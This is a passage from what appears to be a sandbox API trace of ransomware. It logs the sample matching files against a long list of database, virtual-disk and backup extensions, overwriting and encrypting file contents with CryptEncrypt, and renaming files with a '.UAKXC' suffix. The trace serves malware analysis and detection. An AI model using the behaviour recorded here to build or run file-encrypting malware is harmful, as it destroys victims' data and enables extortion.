lpSrch=".vpd") returned 0x0 [0141.374] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".vvv") returned 0x0 [0141.374] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".wdb") returned 0x0 [0141.374] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".wmdb") returned 0x0 [0141.374] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".wrk") returned 0x0 [0141.374] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".xdb") returned 0x0 [0141.374] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".xld") returned 0x0 [0141.374] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".xmlff") returned 0x0 [0141.374] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".abcddb") returned 0x0 [0141.374] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".abs") returned 0x0 [0141.374] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".abx") returned 0x0 [0141.375] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".accdw") returned 0x0 [0141.375] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".adn") returned 0x0 [0141.375] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".db2") returned 0x0 [0141.375] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".fm5") returned 0x0 [0141.375] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".hjt") returned 0x0 [0141.375] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".icg") returned 0x0 [0141.375] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".icr") returned 0x0 [0141.375] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".kdb") returned 0x0 [0141.375] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".lut") returned 0x0 [0141.375] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".maw") returned 0x0 [0141.375] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".mdn") returned 0x0 [0141.375] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".mdt") returned 0x0 [0141.375] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".vdi") returned 0x0 [0141.375] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".vhd") returned 0x0 [0141.375] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".vmdk") returned 0x0 [0141.375] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".pvm") returned 0x0 [0141.375] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".vmem") returned 0x0 [0141.375] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".vmsn") returned 0x0 [0141.375] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".vmsd") returned 0x0 [0141.376] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".nvram") returned 0x0 [0141.376] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".vmx") returned 0x0 [0141.376] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".raw") returned 0x0 [0141.376] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".qcow2") returned 0x0 [0141.376] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".subvol") returned 0x0 [0141.376] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".bin") returned 0x0 [0141.376] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".vsv") returned 0x0 [0141.376] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".avhd") returned 0x0 [0141.376] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".vmrs") returned 0x0 [0141.376] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".vhdx") returned 0x0 [0141.376] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".avdx") returned 0x0 [0141.376] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".vmcx") returned 0x0 [0141.376] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpSrch=".iso") returned 0x0 [0141.376] SetFilePointerEx (in: hFile=0x6c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.376] WriteFile (in: hFile=0x6c8, lpBuffer=0x383fd70*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x383fc78, lpOverlapped=0x0 | out: lpBuffer=0x383fd70*, lpNumberOfBytesWritten=0x383fc78*=0x20c, lpOverlapped=0x0) returned 1 [0141.378] WriteFile (in: hFile=0x6c8, lpBuffer=0x383fc80*, nNumberOfBytesToWrite=0xa, lpNumberOfBytesWritten=0x383fc7c, lpOverlapped=0x0 | out: lpBuffer=0x383fc80*, lpNumberOfBytesWritten=0x383fc7c*=0xa, lpOverlapped=0x0) returned 1 [0141.378] SetEndOfFile (hFile=0x6c8) returned 1 [0141.378] SetFilePointerEx (in: hFile=0x6c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.378] ReadFile (in: hFile=0x6c8, lpBuffer=0x4610000, nNumberOfBytesToRead=0x16a, lpNumberOfBytesRead=0x383fc88, lpOverlapped=0x0 | out: lpBuffer=0x4610000*, lpNumberOfBytesRead=0x383fc88*=0x16a, lpOverlapped=0x0) returned 1 [0141.378] SetFilePointerEx (in: hFile=0x6c8, liDistanceToMove=0xfffffe96, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0141.378] WriteFile (in: hFile=0x6c8, lpBuffer=0x4610000*, nNumberOfBytesToWrite=0x16a, lpNumberOfBytesWritten=0x383fc44, lpOverlapped=0x0 | out: lpBuffer=0x4610000*, lpNumberOfBytesWritten=0x383fc44*=0x16a, lpOverlapped=0x0) returned 1 [0141.379] CloseHandle (hObject=0x6c8) returned 1 [0141.387] GetProcessHeap () returned 0xea0000 [0141.388] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x8, Size=0x7fd7) returned 0xefe4b8 [0141.388] lstrcpyW (in: lpString1=0xefe4b8, lpString2="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn" | out: lpString1="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn") returned="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn" [0141.388] lstrcatW (in: lpString1="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpString2=".UAKXC" | out: lpString1="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn.UAKXC") returned="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn.UAKXC" [0141.388] MoveFileW (lpExistingFileName="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.winword.dev.14.1033.hxn"), lpNewFileName="C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn.UAKXC" (normalized: "c:\\programdata\\microsoft help\\ms.winword.dev.14.1033.hxn.uakxc")) returned 1 [0141.400] GetProcessHeap () returned 0xea0000 [0141.400] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xefe4b8 | out: hHeap=0xea0000) returned 1 [0141.400] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeddd40 | out: hHeap=0xea0000) returned 1 [0141.400] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef27e0 | out: hHeap=0xea0000) returned 1 [0141.400] CryptGenRandom (in: hProv=0xeced80, dwLen=0x20, pbBuffer=0x383fd50 | out: pbBuffer=0x383fd50) returned 1 [0141.400] CryptGenRandom (in: hProv=0xeced80, dwLen=0x8, pbBuffer=0x383fd48 | out: pbBuffer=0x383fd48) returned 1 [0141.400] CryptEncrypt (in: hKey=0xececd0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x383fd70*, pdwDataLen=0x383fc8c*=0x28, dwBufLen=0x20c | out: pbData=0x383fd70*, pdwDataLen=0x383fc8c*=0x200) returned 1 [0141.462] GetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft Help\\nslist.hxl" (normalized: "c:\\programdata\\microsoft help\\nslist.hxl")) returned 0x2022 [0141.463] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft Help\\nslist.hxl" (normalized: "c:\\programdata\\microsoft help\\nslist.hxl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6c4 [0141.463] GetLastError () returned 0x0 [0141.463] GetFileSizeEx (in: hFile=0x6c4, lpFileSize=0x383fc88 | out: lpFileSize=0x383fc88*=8668) returned 1 [0141.463] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".4dd") returned 0x0 [0141.463] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".4dl") returned 0x0 [0141.463] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".accdb") returned 0x0 [0141.463] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".accdc") returned 0x0 [0141.463] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".accde") returned 0x0 [0141.463] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".accdr") returned 0x0 [0141.463] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".accdt") returned 0x0 [0141.463] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".accft") returned 0x0 [0141.463] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".adb") returned 0x0 [0141.463] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".ade") returned 0x0 [0141.463] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".adf") returned 0x0 [0141.463] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".adp") returned 0x0 [0141.463] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".arc") returned 0x0 [0141.463] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".ora") returned 0x0 [0141.463] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".alf") returned 0x0 [0141.464] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".ask") returned 0x0 [0141.464] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".btr") returned 0x0 [0141.464] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".bdf") returned 0x0 [0141.464] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".cat") returned 0x0 [0141.464] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".cdb") returned 0x0 [0141.464] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".ckp") returned 0x0 [0141.464] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".cma") returned 0x0 [0141.464] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".cpd") returned 0x0 [0141.464] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".dacpac") returned 0x0 [0141.464] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".dad") returned 0x0 [0141.464] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".dadiagrams") returned 0x0 [0141.464] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".daschema") returned 0x0 [0141.464] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".db") returned 0x0 [0141.464] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".db-shm") returned 0x0 [0141.464] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".db-wal") returned 0x0 [0141.464] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".db3") returned 0x0 [0141.464] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".dbc") returned 0x0 [0141.464] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".dbf") returned 0x0 [0141.464] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".dbs") returned 0x0 [0141.464] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".dbt") returned 0x0 [0141.464] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".dbv") returned 0x0 [0141.464] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".dbx") returned 0x0 [0141.464] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".dcb") returned 0x0 [0141.464] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".dct") returned 0x0 [0141.464] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".dcx") returned 0x0 [0141.464] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".ddl") returned 0x0 [0141.464] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".dlis") returned 0x0 [0141.465] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".dp1") returned 0x0 [0141.465] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".dqy") returned 0x0 [0141.465] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".dsk") returned 0x0 [0141.465] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".dsn") returned 0x0 [0141.465] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".dtsx") returned 0x0 [0141.465] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".dxl") returned 0x0 [0141.465] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".eco") returned 0x0 [0141.465] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".ecx") returned 0x0 [0141.465] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".edb") returned 0x0 [0141.465] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".epim") returned 0x0 [0141.465] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".exb") returned 0x0 [0141.465] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".fcd") returned 0x0 [0141.465] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".fdb") returned 0x0 [0141.465] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".fic") returned 0x0 [0141.465] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".fmp") returned 0x0 [0141.465] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".fmp12") returned 0x0 [0141.465] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".fmpsl") returned 0x0 [0141.465] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".fol") returned 0x0 [0141.465] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".fp3") returned 0x0 [0141.465] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".fp4") returned 0x0 [0141.465] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".fp5") returned 0x0 [0141.465] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".fp7") returned 0x0 [0141.465] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".fpt") returned 0x0 [0141.466] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".frm") returned 0x0 [0141.466] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".gdb") returned 0x0 [0141.466] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".grdb") returned 0x0 [0141.466] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".gwi") returned 0x0 [0141.466] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".hdb") returned 0x0 [0141.466] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".his") returned 0x0 [0141.466] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".ib") returned 0x0 [0141.466] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".idb") returned 0x0 [0141.466] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".ihx") returned 0x0 [0141.466] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".itdb") returned 0x0 [0141.466] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".itw") returned 0x0 [0141.466] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".jet") returned 0x0 [0141.466] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".jtx") returned 0x0 [0141.466] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".kdb") returned 0x0 [0141.466] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".kexi") returned 0x0 [0141.466] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".kexic") returned 0x0 [0141.466] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".kexis") returned 0x0 [0141.466] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".lgc") returned 0x0 [0141.466] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".lwx") returned 0x0 [0141.466] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".maf") returned 0x0 [0141.466] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".maq") returned 0x0 [0141.467] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".mar") returned 0x0 [0141.467] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".mas") returned 0x0 [0141.467] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".mav") returned 0x0 [0141.467] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".mdb") returned 0x0 [0141.467] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".mdf") returned 0x0 [0141.467] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".mpd") returned 0x0 [0141.467] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".mrg") returned 0x0 [0141.467] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".mud") returned 0x0 [0141.467] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".mwb") returned 0x0 [0141.467] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".myd") returned 0x0 [0141.467] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".ndf") returned 0x0 [0141.467] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".nnt") returned 0x0 [0141.467] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".nrmlib") returned 0x0 [0141.467] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".ns2") returned 0x0 [0141.467] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".ns3") returned 0x0 [0141.467] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".ns4") returned 0x0 [0141.467] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".nsf") returned 0x0 [0141.467] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".nv") returned 0x0 [0141.467] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".nv2") returned 0x0 [0141.467] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".nwdb") returned 0x0 [0141.467] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".nyf") returned 0x0 [0141.467] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".odb") returned 0x0 [0141.468] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".oqy") returned 0x0 [0141.468] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".orx") returned 0x0 [0141.468] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".owc") returned 0x0 [0141.468] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".p96") returned 0x0 [0141.468] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".p97") returned 0x0 [0141.468] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".pan") returned 0x0 [0141.468] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".pdb") returned 0x0 [0141.468] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".pdm") returned 0x0 [0141.468] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".pnz") returned 0x0 [0141.468] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".qry") returned 0x0 [0141.468] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".qvd") returned 0x0 [0141.468] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".rbf") returned 0x0 [0141.468] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".rctd") returned 0x0 [0141.468] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".rod") returned 0x0 [0141.468] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".rodx") returned 0x0 [0141.468] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".rpd") returned 0x0 [0141.468] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".rsd") returned 0x0 [0141.468] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".sas7bdat") returned 0x0 [0141.468] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".sbf") returned 0x0 [0141.468] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".scx") returned 0x0 [0141.468] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".sdb") returned 0x0 [0141.468] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".sdc") returned 0x0 [0141.469] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".sdf") returned 0x0 [0141.469] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".sis") returned 0x0 [0141.469] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".spq") returned 0x0 [0141.469] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".sql") returned 0x0 [0141.469] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".sqlite") returned 0x0 [0141.469] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".sqlite3") returned 0x0 [0141.469] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".sqlitedb") returned 0x0 [0141.469] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".te") returned 0x0 [0141.469] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".temx") returned 0x0 [0141.469] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".tmd") returned 0x0 [0141.469] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".tps") returned 0x0 [0141.469] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\nslist.hxl", lpSrch=".trc") returned 0x0 [0141.469] StrStrIW 